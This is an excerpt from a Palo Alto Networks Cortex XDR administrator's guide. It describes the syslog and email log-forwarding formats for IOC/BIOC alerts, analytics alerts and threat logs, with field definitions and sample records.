3/18/2012:05:17.567 PM<14>1 2020-03-18T12:05:17.567590Z cortexxdr -

- - CEF:0|Palo Alto Networks|Cortex XDR|Cortex XDR x.x |Management
Audit Logs|REPORTING|6|suser=test end=1584533117501 externalId=5820
cs1Label=email [email protected] cs2Label=subtype cs2=Slack
Report cs3Label=result cs3=SUCCESS cs4Label=reason cs4=None msg=Slack report

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding 451

© 2020 Palo Alto Networks, Inc.
 'scheduled_1584533112442' ID 00 to ['CUXM741BK', 'C01022YU00L', 'CV51Y1E2X',
'CRK3VASN9'] tenantname=test tenantCDLid=11111 CSPaccountname=00000

Cortex XDR Log Format for IOC and BIOC Alerts

Cortex XDR™ logs its IOC and BIOC alerts to the Cortex Data Lake. If you configure Cortex XDR to forward
logs in legacy format, when alert logs are forwarded from Cortex Data Lake, each log record has the
following format:
Syslog format:

"/edrData/action_country","/edrData/action_download","/edrData/
action_external_hostname","/edrData/action_external_port","/
edrData/action_file_extension","/edrData/action_file_md5","/
edrData/action_file_name","/edrData/action_file_path","/
edrData/action_file_previous_file_extension","/edrData/
action_file_previous_file_name","/edrData/action_file_previous_file_path","/
edrData/action_file_sha256","/edrData/action_file_size","/edrData/
action_file_remote_ip","/edrData/action_file_remote_port","/edrData/
action_is_injected_thread","/edrData/action_local_ip","/edrData/
action_local_port","/edrData/action_module_base_address","/edrData/
action_module_image_size","/edrData/action_module_is_remote","/
edrData/action_module_is_replay","/edrData/action_module_path","/
edrData/action_module_process_causality_id","/
edrData/action_module_process_image_command_line","/
edrData/action_module_process_image_extension","/
edrData/action_module_process_image_md5","/edrData/
action_module_process_image_name","/edrData/
action_module_process_image_path","/edrData/
action_module_process_image_sha256","/edrData/
action_module_process_instance_id","/edrData/
action_module_process_is_causality_root","/edrData/
action_module_process_os_pid","/edrData/
action_module_process_signature_product","/edrData/
action_module_process_signature_status","/edrData/
action_module_process_signature_vendor","/edrData/
action_network_connection_id","/edrData/action_network_creation_time","/
edrData/action_network_is_ipv6","/edrData/action_process_causality_id","/
edrData/action_process_image_command_line","/edrData/
action_process_image_extension","/edrData/action_process_image_md5","/edrData/
action_process_image_name","/edrData/action_process_image_path","/edrData/
action_process_image_sha256","/edrData/action_process_instance_id","/edrData/
action_process_integrity_level","/edrData/action_process_is_causality_root","/
edrData/action_process_is_replay","/edrData/action_process_is_special","/
edrData/action_process_os_pid","/edrData/action_process_signature_product","/
edrData/action_process_signature_status","/edrData/
action_process_signature_vendor","/edrData/action_proxy","/edrData/
action_registry_data","/edrData/action_registry_file_path","/edrData/
action_registry_key_name","/edrData/action_registry_value_name","/
edrData/action_registry_value_type","/edrData/action_remote_ip","/edrData/
action_remote_port","/edrData/action_remote_process_causality_id","/
edrData/action_remote_process_image_command_line","/
edrData/action_remote_process_image_extension","/
edrData/action_remote_process_image_md5","/edrData/
action_remote_process_image_name","/edrData/
action_remote_process_image_path","/edrData/
action_remote_process_image_sha256","/edrData/
action_remote_process_is_causality_root","/edrData/
action_remote_process_os_pid","/edrData/
action_remote_process_signature_product","/edrData/

452 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding

© 2020 Palo Alto Networks, Inc.
action_remote_process_signature_status","/edrData/
action_remote_process_signature_vendor","/edrData/
action_remote_process_thread_id","/edrData/
action_remote_process_thread_start_address","/edrData/
action_thread_thread_id","/edrData/action_total_download","/edrData/
action_total_upload","/edrData/action_upload","/edrData/action_user_status","/
edrData/action_username","/edrData/actor_causality_id","/edrData/
actor_effective_user_sid","/edrData/actor_effective_username","/edrData/
actor_is_injected_thread","/edrData/actor_primary_user_sid","/edrData/
actor_primary_username","/edrData/actor_process_causality_id","/edrData/
actor_process_command_line","/edrData/actor_process_execution_time","/edrData/
actor_process_image_command_line","/edrData/actor_process_image_extension","/
edrData/actor_process_image_md5","/edrData/actor_process_image_name","/
edrData/actor_process_image_path","/edrData/actor_process_image_sha256","/
edrData/actor_process_instance_id","/edrData/actor_process_integrity_level","/
edrData/actor_process_is_special","/edrData/actor_process_os_pid","/edrData/
actor_process_signature_product","/edrData/actor_process_signature_status","/
edrData/actor_process_signature_vendor","/edrData/actor_thread_thread_id","/
edrData/agent_content_version","/edrData/agent_host_boot_time","/edrData/
agent_hostname","/edrData/agent_id","/edrData/agent_ip_addresses","/edrData/
agent_is_vdi","/edrData/agent_os_sub_type","/edrData/agent_os_type","/
edrData/agent_session_start_time","/edrData/agent_version","/edrData/
causality_actor_causality_id","/edrData/causality_actor_effective_user_sid","/
edrData/causality_actor_effective_username","/
edrData/causality_actor_primary_user_sid","/edrData/
causality_actor_primary_username","/edrData/
causality_actor_process_causality_id","/edrData/
causality_actor_process_command_line","/edrData/
causality_actor_process_execution_time","/edrData/
causality_actor_process_image_command_line","/
edrData/causality_actor_process_image_extension","/
edrData/causality_actor_process_image_md5","/edrData/
causality_actor_process_image_name","/edrData/
causality_actor_process_image_path","/edrData/
causality_actor_process_image_sha256","/edrData/
causality_actor_process_instance_id","/edrData/
causality_actor_process_integrity_level","/edrData/
causality_actor_process_is_special","/edrData/
causality_actor_process_os_pid","/edrData/
causality_actor_process_signature_product","/edrData/
causality_actor_process_signature_status","/edrData/
causality_actor_process_signature_vendor","/edrData/event_id","/
edrData/event_is_simulated","/edrData/event_sub_type","/edrData/
event_timestamp","/edrData/event_type","/edrData/event_utc_diff_minutes","/
edrData/event_version","/edrData/host_metadata_hostname","/edrData/
missing_action_remote_process_instance_id","/facility","/generatedTime","/
recordType","/recsize","/trapsId","/uuid","/xdr_unique_id","/
meta_internal_id","/external_id","/is_visible","/is_secdo_event","/
severity","/alert_source","/internal_id","/matching_status","/
local_insert_ts","/source_insert_ts","/alert_name","/alert_category","/
alert_description","/bioc_indicator","/matching_service_rule_id","/
external_url","/xdr_sub_type","/bioc_category_enum_key","/
alert_action_status","/agent_data_collection_status","/attempt_counter","/
case_id","/global_content_version_id","/global_rule_id","/is_whitelisted"

When alert logs are forwarded by email, each field is labeled, one line per field:
Email body format example:

edrData/action_country:
edrData/action_download:

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding 453

© 2020 Palo Alto Networks, Inc.
 edrData/action_external_hostname:
edrData/action_external_port:
edrData/action_file_extension: pdf
edrData/action_file_md5: null
edrData/action_file_name: XORXOR2614081980.pdf
edrData/action_file_path: C:\ProgramData\Cyvera\Ransomware
\16067987696371268494\XORXOR2614081980.pdf
edrData/action_file_previous_file_extension: null
edrData/action_file_previous_file_name: null
edrData/action_file_previous_file_path: null
edrData/action_file_sha256: null
edrData/action_file_size: 0
edrData/action_file_remote_ip: null
edrData/action_file_remote_port: null
edrData/action_is_injected_thread:
edrData/action_local_ip:
edrData/action_local_port:
edrData/action_module_base_address:
edrData/action_module_image_size:
edrData/action_module_is_remote:
edrData/action_module_is_replay:
edrData/action_module_path:
edrData/action_module_process_causality_id:
edrData/action_module_process_image_command_line:
edrData/action_module_process_image_extension:
edrData/action_module_process_image_md5:
edrData/action_module_process_image_name:
edrData/action_module_process_image_path:
edrData/action_module_process_image_sha256:
edrData/action_module_process_instance_id:
edrData/action_module_process_is_causality_root:
edrData/action_module_process_os_pid:
edrData/action_module_process_signature_product:
edrData/action_module_process_signature_status:
edrData/action_module_process_signature_vendor:
edrData/action_network_connection_id:
edrData/action_network_creation_time:
edrData/action_network_is_ipv6:
edrData/action_process_causality_id:
edrData/action_process_image_command_line:
edrData/action_process_image_extension:
edrData/action_process_image_md5:
edrData/action_process_image_name:
edrData/action_process_image_path:
edrData/action_process_image_sha256:
edrData/action_process_instance_id:
edrData/action_process_integrity_level:
edrData/action_process_is_causality_root:
edrData/action_process_is_replay:
edrData/action_process_is_special:
edrData/action_process_os_pid:
edrData/action_process_signature_product:
edrData/action_process_signature_status:
edrData/action_process_signature_vendor:
edrData/action_proxy:
edrData/action_registry_data:
edrData/action_registry_file_path:
edrData/action_registry_key_name:
edrData/action_registry_value_name:
edrData/action_registry_value_type:
edrData/action_remote_ip:
edrData/action_remote_port:

454 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding

© 2020 Palo Alto Networks, Inc.
edrData/action_remote_process_causality_id:
edrData/action_remote_process_image_command_line:
edrData/action_remote_process_image_extension:
edrData/action_remote_process_image_md5:
edrData/action_remote_process_image_name:
edrData/action_remote_process_image_path:
edrData/action_remote_process_image_sha256:
edrData/action_remote_process_is_causality_root:
edrData/action_remote_process_os_pid:
edrData/action_remote_process_signature_product:
edrData/action_remote_process_signature_status:
edrData/action_remote_process_signature_vendor:
edrData/action_remote_process_thread_id:
edrData/action_remote_process_thread_start_address:
edrData/action_thread_thread_id:
edrData/action_total_download:
edrData/action_total_upload:
edrData/action_upload:
edrData/action_user_status:
edrData/action_username:
edrData/actor_causality_id: AdUcamNT99kAAAAEAAAAAA==
edrData/actor_effective_user_sid: S-1-5-18
edrData/actor_effective_username: NT AUTHORITY\SYSTEM
edrData/actor_is_injected_thread: false
edrData/actor_primary_user_sid: S-1-5-18
edrData/actor_primary_username: NT AUTHORITY\SYSTEM
edrData/actor_process_causality_id: AdUcamNT99kAAAAEAAAAAA==
edrData/actor_process_command_line:
edrData/actor_process_execution_time: 1559827133585
edrData/actor_process_image_command_line:
edrData/actor_process_image_extension:
edrData/actor_process_image_md5:
edrData/actor_process_image_name: System
edrData/actor_process_image_path: System
edrData/actor_process_image_sha256:
edrData/actor_process_instance_id: AdUcamNT99kAAAAEAAAAAA==
edrData/actor_process_integrity_level: 16384
edrData/actor_process_is_special: 1
edrData/actor_process_os_pid: 4
edrData/actor_process_signature_product: Microsoft Windows
edrData/actor_process_signature_status: 1
edrData/actor_process_signature_vendor: Microsoft Corporation
edrData/actor_thread_thread_id: 64
edrData/agent_content_version: 58-9124
edrData/agent_host_boot_time: 1559827133585
edrData/agent_hostname: padme-7
edrData/agent_id: a832f35013f16a06fc2495843674a3e9
edrData/agent_ip_addresses: ["10.196.172.74"]
edrData/agent_is_vdi: false
edrData/agent_os_sub_type: Windows 7 [6.1 (Build 7601: Service Pack 1)]
edrData/agent_os_type: 1
edrData/agent_session_start_time: 1559827592661
edrData/agent_version: 6.1.0.13895
edrData/causality_actor_causality_id: AdUcamNT99kAAAAEAAAAAA==
edrData/causality_actor_effective_user_sid:
edrData/causality_actor_effective_username:
edrData/causality_actor_primary_user_sid: S-1-5-18
edrData/causality_actor_primary_username: NT AUTHORITY\SYSTEM
edrData/causality_actor_process_causality_id:
edrData/causality_actor_process_command_line:
edrData/causality_actor_process_execution_time: 1559827133585
edrData/causality_actor_process_image_command_line:

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding 455

© 2020 Palo Alto Networks, Inc.
 edrData/causality_actor_process_image_extension:
edrData/causality_actor_process_image_md5:
edrData/causality_actor_process_image_name: System
edrData/causality_actor_process_image_path: System
edrData/causality_actor_process_image_sha256:
edrData/causality_actor_process_instance_id: AdUcamNT99kAAAAEAAAAAA==
edrData/causality_actor_process_integrity_level: 16384
edrData/causality_actor_process_is_special: 1
edrData/causality_actor_process_os_pid: 4
edrData/causality_actor_process_signature_product: Microsoft Windows
edrData/causality_actor_process_signature_status: 1
edrData/causality_actor_process_signature_vendor: Microsoft Corporation
edrData/event_id: AAABa13u2PQsqXnCAB1qjw==
edrData/event_is_simulated: false
edrData/event_sub_type: 1
edrData/event_timestamp: 1560649063308
edrData/event_type: 3
edrData/event_utc_diff_minutes: 120
edrData/event_version: 20
edrData/host_metadata_hostname:
edrData/missing_action_remote_process_instance_id:
facility:
generatedTime: 2019-06-16T01:37:43
recordType: alert
recsize:
trapsId:
uuid:
xdr_unique_id: ae65c92c6e704023df129c728eab3d3e
meta_internal_id: None
external_id: 318b7f91-ae74-4860-abd1-b463e8cd6deb
is_visible: null
is_secdo_event: null
severity: SEV_010_INFO
alert_source: BIOC
internal_id: None
matching_status: null
local_insert_ts: null
source_insert_ts: 1560649063308
alert_name: BIOC-16
alert_category: CREDENTIAL_ACCESS
alert_description: File action type = all AND name = *.pdf
bioc_indicator:
"[{""pretty_name"":""File"",""data_type"":null,""render_type"":""entity"",
""entity_map"":null},{""pretty_name"":""action type"",""data_type"":null,
""render_type"":""attribute"",""entity_map"":null},{""pretty_name"":""="",
""data_type"":null,""render_type"":""operator"",""entity_map"":null},
{""pretty_name"":""all"",""data_type"":null,""render_type"":""value"",
""entity_map"":null},{""pretty_name"":""AND"",""data_type"":null,
""render_type"":""connector"",""entity_map"":null},
{""pretty_name"":""name"",""data_type"":""TEXT"",
""render_type"":""attribute"",""entity_map"":""attributes""},
{""pretty_name"":""="",""data_type"":null,""render_type"":""operator"",
""entity_map"":""attributes""},{""pretty_name"":""*.pdf"",
""data_type"":null,""render_type"":""value"",
""entity_map"":""attributes""}]"
matching_service_rule_id: 200
external_url: null
xdr_sub_type: BIOC - Credential Access
bioc_category_enum_key: null
alert_action_status: null
agent_data_collection_status: null
attempt_counter: null

456 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding

© 2020 Palo Alto Networks, Inc.
case_id: null
global_content_version_id:
global_rule_id:
is_whitelisted: false

The following table summarizes the field prefixes and additional relevant fields available for BIOC and IOC
alert logs.

Field Name Definition

/edrData/action_file* Fields that begin with this prefix describe attributes

of a file for which Traps reported activity.

edrData/action_module* Fields that begin with this prefix describe attributes

of a module for which Traps reported module loading
activity.

edrData/action_module_process* Fields that begin with this prefix describe attributes

and activity related to processes reported by Traps
that load modules such as DLLs on the endpoint.

edrData/action_process_image* Fields that begin with this prefix describe attributes

of a process image for which Traps reported activity.

edrData/action_registry* Fields that begin with this prefix describe registry

activity and attributes such as key name, data, and
previous value for which Traps reported activity.

edrData/action_network Fields that begin with this prefix describe network

attributes for which Traps reported activity.

edrData/action_remote_process* Fields that begin with this prefix describe attributes

of remote processes for which Traps reported
activity.

edrData/actor* Fields that begin with this prefix describe attributes

about the acting user that initiated the activity on
the endpoint.

edrData/agent* Fields that begin with this prefix describe attributes

about the Traps agent deployed on the endpoint.

edrData/causality_actor* Fields that begin with this prefix describe attributes

about the causality group owner.

Additional useful fields:

/severity Severity assigned to the alert:

• SEV_010_INFO
• SEV_020_LOW
• SEV_030_MEDIUM
• SEV_040_HIGH

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding 457

© 2020 Palo Alto Networks, Inc.
 Field Name Definition
• SEV_090_UNKNOWN

/alert_source Source of the alert: BIOC or IOC

/local_insert_ts Date and time when Cortex XDR – Investigation and

Response ingested the app.

/source_insert_ts Date and time the alert was reported by the alert
source.

/alert_name If the alert was generated by Cortex XDR –

Investigation and Response, the alert name will be
the specific Cortex XDR rule that created the alert
(BIOC or IOC rule name). If from an external system,
it will carry the name assigned to it by Cortex XDR .

/alert_category Alert category based on the alert source.

• BIOC alert categories:
• OTHER
• PERSISTENCE
• EVASION
• TAMPERING
• FILE_TYPE_OBFUSCATION
• PRIVILEGE_ESCALATION
• CREDENTIAL_ACCESS
• LATERAL_MOVEMENT
• EXECUTION
• COLLECTION
• EXFILTRATION
• INFILTRATION
• DROPPER
• FILE_PRIVILEGE_MANIPULATION
• RECONNAISSANCE
• IOC alert categories:
• HASH
• IP
• PATH
• DOMAIN_NAME
• FILENAME
• MIXED

/alert_description Text summary of the event including the alert

source, alert name, severity, and file path. For alerts
triggered by BIOC and IOC rules, Cortex XDR
displays detailed information about the rule.

/bioc_indicator A JSON representation of the rule characteristics.

For example:

458 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding

© 2020 Palo Alto Networks, Inc.
Field Name Definition

[{""pretty_name"":""File"",""data_type"":null,
""render_type"":""entity"",""entity_map"":null},
{""pretty_name"":""action type"",
""data_type"":null,""render_type"":""attribute"",
""entity_map"":null},
{""pretty_name"":""="",
""data_type"":null,""render_type"":""operator"",
""entity_map"":null},
{""pretty_name"":""all"",
""data_type"":null,""render_type"":""value"",
""entity_map"":null},
{""pretty_name"":""AND"",
""data_type"":null,""render_type"":""connector"",
""entity_map"":null},
{""pretty_name"":""name"",
""data_type"":""TEXT"",
""render_type"":""attribute"",
""entity_map"":""attributes""},
{""pretty_name"":""="",""data_type"":null,
""render_type"":""operator"",
""entity_map"":""attributes""},
{""pretty_name"":""*.pdf"",""data_type"":null,
""render_type"":""value"",
""entity_map"":""attributes""}]"

/bioc_category_enum_key Alert category based on the alert source. An example

of a BIOC alert category is Evasion. An example of a
Traps alert category is Exploit Modules.

/alert_action_status Action taken by the alert sensor with action status

displayed in parenthesis:
• Detected
• Detected (Download)
• Detected (Post Detected)
• Detected (Prompt Allow)
• Detected (Reported)
• Detected (Scanned)
• Prevented (Blocked)
• Prevented (Prompt Block)

/case_id Unique identifier for the incident.

/global_content_version_id Unique identifier for the content version in which a

Palo Alto Networks global BIOC rule was released.

/global_rule_id Unique identifier for an alert triggered by a Palo Alto

Networks global BIOC rule.

/is_whitelisted Boolean indicating whether the alert is excluded or

not.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding 459

© 2020 Palo Alto Networks, Inc.
Cortex XDR Analytics Log Format
Cortex XDR™ Analytics logs its alerts to the Cortex Data Lake as analytics alert logs. If you configure Cortex
XDR to forward logs in legacy format, each log record has the following format:
Syslog format:

sub_type,time_generated,id,version_info/document_version,version_info/
magnifier_version,version_info/detection_version,alert/url,alert/
category,alert/type,alert/name,alert/description/html,alert/description/
text,alert/severity,alert/state,alert/is_whitelisted,alert/ports,alert/
internal_destinations/single_destinations,alert/internal_destinations/
ip_ranges,alert/external_destinations,alert/app_id,alert/schedule/
activity_first_seen_at,alert/schedule/activity_last_seen_at,alert/schedule/
first_detected_at,alert/schedule/last_detected_at,user/user_name,user/
url,user/display_name,user/org_unit,device/id,device/url,device/mac,device/
hostname,device/ip,device/ip_ranges,device/owner,device/org_unit,files

Email body format example:

When analytics alert logs are forwarded by email, each field is labeled, one line per field:

sub_type: Update
time_generated: 1547717480
id: 4
version_info/document_version: 1
version_info/magnifier_version: 1.8
version_info/detection_version: 2019.2.0rc1
alert/url: https:\/\/ddc1...
alert/category: Recon
alert/type: Port Scan
alert/name: Port Scan
alert/description/html: \t<ul>\n\t\t<li>The device....
alert/description/text: The device ...
alert/severity: Low
alert/state: Reopened
alert/is_whitelisted: false
alert/ports: "[1,2,3,4,5,6,7,8,9,10,11...]
alert/internal_destinations/single_destinations: []
alert/internal_destinations/ip_ranges:
"[{""max_ip"":""..."",""name"":""..."",""min_ip"":""...""}]"
alert/external_destinations: []
alert/app_id:
alert/schedule/activity_first_seen_at: 1542178800
alert/schedule/activity_last_seen_at: 1542182400
alert/schedule/first_detected_at: 1542182400
alert/schedule/last_detected_at: 1542182400
user/user_name:
user/url:
user/display_name:
user/org_unit:
device/id: 2-85e40edd-b2d1-1f25-2c1e-a3dd576c8a7e
device/url: https:\/\/ddc1 ...
device/mac: 00-50-56-a5-db-b2
device/hostname: DC1ENV3APC42
device/ip: 10.201.102.17
device/ip_ranges:
"[{""max_ip"":""..."",""name"":""..."",""min_ip"":""..."",""asset"":""""}]"
device/owner:
device/org_unit:

460 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding

© 2020 Palo Alto Networks, Inc.
files: []

The following table describes each field:

Field Name Definition

sub_type Alert log subtype. Values are:

• New—First log record for the alert with this record
id.
• Update—Log record identifies an update to a
previously logged alert.
• StateOnlyUpdate—Alert state is updated. For
internal use only.

time_generated Time the log record was sent to the Cortex Data
Lake. Value is a Unix Epoch timestamp.

id Unique identifier for the alert. Any given alert

can generate multiple log records—one when the
alert is initially raised, and then additional records
every time the alert status changes. This ID remains
constant for all such alert records.
You can obtain the current status of the alert by
looking for log records with this id and the most
recent alert/schedule/last_detected_at
timestamp.

version_info/document_version Identifies the log schema version number used for

this log record.

version_info/magnifier_version The version number of the Cortex XDR – Analytics

instance that wrote this log record.

version_info/detection_version Identifies the version of the Cortex XDR – Analytics

detection software used to raise the alert.

alert/url Provides the full URL to the alert page in the Cortex
XDR – Analytics user interface.

alert/category Identifies the alert category, which is a reflection of

the anomalous network activity location in the attack
life cycle. Possible categories are:
• C&C—The network activity is possibly the
result of malware attempting to connect to its
Command & Control server.
• Exfiltration—A large amount of data is being
transferred to an endpoint that is external to the
network.
• Lateral—The network activity is indicative of
an attacker who is attempting to move from one
endpoint to another on the network.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding 461

© 2020 Palo Alto Networks, Inc.
 Field Name Definition
• Malware—A file has been discovered on an
endpoint that is probably malware or riskware.
Malware alerts can also be raised based on
network activity that is indicative of automated
malicious traffic generation.
• Recon—The network activity is indicative
an attacker that is exploring the network for
endpoints and other resources to attack.

alert/type Identifies the categorization to which the alert

belongs. For example Tunneling Process, Sandbox
Detection, Malware, and so forth.

alert/name The alert name as it appears in the Cortex XDR –

Analytics user interface.

alert/description/html The alert textual description in HTML formatting.

alert/description/text The alert textual description in plain text.

alert/severity Identifies the alert severity. These severities indicate

the likelihood that the anomalous network activity is
a real attack.
• High—The alert is confirmed to be a network
attack.
• Medium—The alert is suspicious enough to
require additional investigation.
• Low—The alert is unverified. Whether the alert is
indicative of a network attack is unknown.

alert/state Identifies the alert state.

• Open—The alert is currently active and should be
undergoing triage or investigation by the network
security analysts.
• Reopened—The alert was previously resolved or
dismissed, but new network activity has caused
Cortex XDR – Analytics to reopen the alert.
• Archived—No action was taken on the alert in
the Cortex XDR – Analytics user interface, and no
further network activity has occurred that caused
it to remain active.
• Resolved—Network personnel have taken
enough action to end the attack.
• Dismissed—The anomaly has been examined
and deemed to be normal, sanctioned, network
activity.

alert/is_whitelisted Indicates whether the alert is whitelisted.

Whitelisting indicates that anomalous-appearing
network activity is legitimate. If an alert is
whitelisted, then it is not visible in the Cortex XDR

462 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding

© 2020 Palo Alto Networks, Inc.
Field Name Definition
Analytics user interface. Alerts can be dismissed or
archived and still have a whitelist rule.

alert/ports List of ports accessed by the network entity during

its anomalous behavior.

alert/internal_destinations/single_destinations Network destinations that the entity reached, or

tried to reach, during the course of the network
activity that caused Cortex XDR – Analytics to raise
the alert. This field contains a sequence of JSON
objects, each of which contains the following fields:
• ip—The destination IP address.
• name—The destination name (for example, a host
name).

alert/internal_destinations/ip_ranges IP address range subnets that the entity reached,

or tried to reach, during the course of the network
activity that caused Cortex XDR – Analytics to raise
the alert. This field contains a sequence of JSON
objects, each of which contains the following fields:
• max_ip—Last IP address in the subnet.
• min_ip—First IP address in the subnet.
• name—Subnet name.

alert/external_destinations Provides a list of destinations external to the

monitored network that the entity tried to reach,
or actually reached, during the activity that raised
this alert. This list can contain IP addresses or fully
qualified domain names.

alert/app_id The App-ID associated with this alert.

alert/schedule/activity_first_seen_at Time when Cortex XDR – Analytics first detected

the network activity that caused it to raise the alert.
Be aware that there is frequently a delay between
this timestamp, and the time when Cortex XDR –
Analytics raises an alert (see the alert/schedule/
first_detected_at field).

alert/schedule/activity_last_seen_at Time when Cortex XDR – Analytics last detected the

network activity that caused it to raise the alert.

alert/schedule/first_detected_at Time when Cortex XDR – Analytics first alerted on

the network activity.

alert/schedule/last_detected_at Time when Cortex XDR – Analytics last alerted on

the network activity.

user/user_name The name of the user associated with this alert. This
name is obtained from Active Directory.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding 463

© 2020 Palo Alto Networks, Inc.
 Field Name Definition

user/url Provides the full URL to the user page in the Cortex
XDR – Analytics user interface for the user who is
associated with the alert.

user/display_name The user name as retrieved from Active Directory.

This is the user name displayed within the Cortex
XDR – Analytics user interface for the user who is
associated with this alert.

user/org_unit The organizational unit of the user associated with

this alert, as identified using Active Directory.

device/id A unique ID assigned by Cortex XDR – Analytics to

the device. All alerts raised due to activity occurring
on this endpoint will share this ID.

device/url Provides the full URL to the device page in the

Cortex XDR – Analytics user interface.

device/mac The MAC address of the network card in use on the

device.

device/hostname The device host name.

device/ip The device IP address.

device/ip_ranges Identifies the subnet or subnets that the device is on.

This sequence can contain multiple inclusive subnets.
Each element in this sequence is a JSON object with
the following fields:
• asset—The asset name assigned to the device
from within the Cortex XDR Analytics user
interface.
• max_ip—Last IP address in the subnet.
• min_ip—First IP address in the subnet.
• name—Subnet name.

device/owner The user name of the person who owns the device.

device/org_unit The organizational unit that owns the device, as

identified by Active Directory.

files Identifies the files associated with the alert. Each

element in this sequence is a JSON object with the
following fields:
• full_path—The file full path (including the file
name).
• md5—The file MD5 hash.

464 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding

© 2020 Palo Alto Networks, Inc.
Cortex XDR Log Formats
The following topics list the fields of each Cortex XDR log type that the Cortex Data Lake app can forward
to an external server or email destination.
With log forwarding to a syslog receiver, the Cortex Data Lake sends logs in the IETF syslog message format
defined in RFC 5425. To facilitate parsing, the delimiter is a comma and each field is a comma-separated
value (CSV) string. The FUTURE_USE tag applies to fields that Cortex XDR does not currently implement.
With log forwarding to an email destination, the Cortex Data Lake sends an email with each field on a
separate line in the email body.
• Threat Logs
• Config Logs
• Analytics Logs
• System Logs

Threat Logs
Syslog format: recordType, class, FUTURE_USE, eventType, generatedTime, serverTime, agentTime,
tzOffset, FUTURE_USE, facility, customerId, trapsId, serverHost, serverComponentVersion, regionId,
isEndpoint, agentId, osType, isVdi, osVersion, is64, agentIp, deviceName, deviceDomain, severity,
trapsSeverity, agentVersion, contentVersion, protectionStatus, preventionKey, moduleId, profile,
moduleStatusId, verdict, preventionMode, terminate, terminateTarget, quarantine, block, postDetected,
eventParameters(Array), sourceProcessIdx(Array), targetProcessIdx(Array), fileIdx(Array), processes(Array),
files(Array), users(Array), urls(Array), description(Array)
Email body format example:

recordType: threat
messageData/class: threat
messageData/subClass:
eventType: AgentSecurityEvent
generatedTime: 2019-01-29T05:07:58.045-08:00
serverTime: 2018-07-02T20:01:39.591Z
endPointHeader/agentTime: 2018-07-02T20:01:03Z
endPointHeader/tzOffset: 180
product:
facility: TrapsAgent
customerId: 245143
trapsId: mac510a2monday-01
serverHost: coreop-qaauta-2606-0-112132729246-266
serverComponentVersion: 2.0.2
regionId: 70
isEndpoint: 1
agentId: dc3af3198f172048082c21ff0956866b
endPointHeader/osType: 2
endPointHeader/isVdi: 0
endPointHeader/osVersion: 10.11.6
endPointHeader/is64: 1
endPointHeader/agentIp: 10.200.37.201
endPointHeader/deviceName: A1260700MC1011
endPointHeader/deviceDomain:
severity: emergency
messageData/trapsSeverity: medium
endPointHeader/agentVersion: 5.1.0.1401
endPointHeader/contentVersion: 26-3625
endPointHeader/protectionStatus: 0
messageData/preventionKey: 9a94965188d2455486dd8d60cf4b3849
messageData/moduleId: COMPONENT_EPM_J01

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding 465

© 2020 Palo Alto Networks, Inc.
 messageData/profile: ExploitModules
messageData/moduleStatusId: CYSTATUS_JIT_EXCEPTION
messageData/verdict:
messageData/preventionMode: blocked
messageData/terminate: 1
messageData/terminateTarget:
quarantine:
messageData/block: 0
messageData/postDetected: 0
messageData/eventParameters: "[""/Users/administrator/Desktop/JitMac/
j01_test"",""711046b89e2f2c70cdbb41f615c54bd1b4270ecbbb176edeb1bb4fe4619""]"
messageData/sourceProcessIdx: 0
messageData/targetProcessIdx: -1
messageData/fileIdx: 0
messageData/processes: "[{""exeFileIdx"":0,""commandLine"":""/
Users/Administrator/Desktop/JitMac/j01_test test=system
depth=1"",""userIdx"":0,""pid"":1359,""parentId"":452}]"
messageData/files:
"[{""sha256"":""711046b89e2f2c70cdbb41f615c54bd1b4270ecbbb176edeb1bb4654619"",
""rawFullPath"":""/Users/administrator/Desktop/JitMac/j01_test"",""signers"":
[""N/A""],""fileName"":""j01_test""}]"
messageData/users: "[{""userName"":""Administrator""}]"
messageData/urls: []
messageData/description: Memory Corruption Exploit

Field Name Description

recordType Record type associated with the event and that you
can use when managing logging quotas. In this case,
the record type is threat which includes logs related
to security events that occur on the endpoints.

class Class of Cortex XDR agent log: config, policy,

system, or agent_log.

eventType Subtype of event: AgentActionReport,

AgentDeviceControlViolation,
AgentGenericMessage, AgentSamReport,
AgentScanReport, AgentSecurityEvent,
AgentStatistics, AgentTimelineEvent,
ServerLogPerAgent, ServerLogPerTenant, or
ServerLogSystem.

generatedTime Coordinated Universal Time (UTC) equivalent

of the time at which an event was logged. For
agent events, this represents the time on the
endpoint. For policy, configuration, and system
events, this represents the time on Cortex XDR
in ISO-8601 string representation (for example,
2017-01-24T09:08:59Z).

serverTime Coordinated Universal Time (UTC) equivalent of

the time at which the server generated the log. If
the log was generated on an endpoint, this field
identifies the time the server received the log

466 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding

© 2020 Palo Alto Networks, Inc.
Field Name Description
in ISO-8601 string representation (for example,
2017-01-24T09:08:59Z).

agentTime Coordinated Universal Time (UTC) equivalent of the

time at which an agent logged an event in ISO-8601
string representation.

tzOffset Effective endpoint time zone offset from UTC, in

minutes.

facility The Cortex XDR system component that

initiated the event, for example: TrapsAgent,
TrapsServiceCore, TrapsServiceManagement, and
TrapsServiceBackend.

customerId The ID that uniquely identifies the Cortex Data

Lake instance which received this log record.

trapsId Tenant external ID.

serverHost Hostname of Cortex XDR.

serverComponentVersion Software version of Cortex XDR.

regionId ID of Cortex XDR region:

• 10—Americas (N. Virginia)
• 70—EMEA (Frankfurt)

isEndpoint Indicates whether the event occurred on an

endpoint.
• 0—No, host is not an endpoint.
• 1—Yes, host is an endpoint.

agentId Unique identifier for the Cortex XDR agent.

osType Operating system of the endpoint:

• 1—Windows
• 2—OS X/macOS
• 3—Android
• 4—Linux

